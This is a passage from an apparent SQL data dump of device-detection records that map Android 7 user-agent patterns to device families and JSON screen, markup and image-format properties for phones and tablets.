Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; A3_mini) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; A5500) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; A574BL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; A576BL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; A58B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; A7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; A75B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; A77) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; A7Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; A8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; A8_Lite) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; A9_Lite) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; A9_Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ADR9) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc_adr','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ADVAN S40) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; AGM A8 SE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; AGM A8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; AGM X2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; AGS-L09) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; AGS-L09) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; AGS-W09) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ALBA 4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ALIGATOR S5065) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ALIGATOR S5070) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; AM410) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; AM508) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; AM509) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; AM515) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; AM518) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; AM520) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; AM530) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; AM535) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ARES 83LTE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; AS-502) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; AS-503) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; AS-5434) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; AS-5436_Grid) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ASUS_A001) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":480,\"screenHeight\":853,\"pixelRatio\":2.25,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ASUS_A002) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ASUS_A006) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ASUS_A009) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ASUS_P00I) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_asus','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ASUS_X008D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ASUS_X008DA) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ASUS_X008DB) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ASUS_X008DC) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ASUS_X00DD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ASUS_X00DDA) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ASUS_X00DDB) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ASUS_X00DS) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ASUS_X00GD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ASUS_X00HD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ASUS_X00ID) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ASUS_X00KD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ASUS_X00LD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ASUS_X00LDA) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ASUS_X00LDB) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ASUS_X015D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ASUS_X017DA) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ASUS_X018D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ASUS_X018DC) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ASUS_Z012D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ASUS_Z012DA) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ASUS_Z012DB) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ASUS_Z012DC) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ASUS_Z012DE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ASUS_Z012S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ASUS_Z017D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ASUS_Z017DA) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ASUS_Z017DB) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ASUS_Z017DC) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ASUS_Z01BD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ASUS_Z01BDA) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ASUS_Z01BDB) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ASUS_Z01BDC) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ASUS_Z01BS) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ASUS_Z01FD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ASUS_Z01GD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ASUS_Z01HD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ASUS_Z01HDA) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ASUS_Z01KD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ASUS_Z01KDA) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ASUS_Z01KS) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ASUS_Z01MD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ASUS_Z01MDA) AppleWebKit/* (KHTML, like 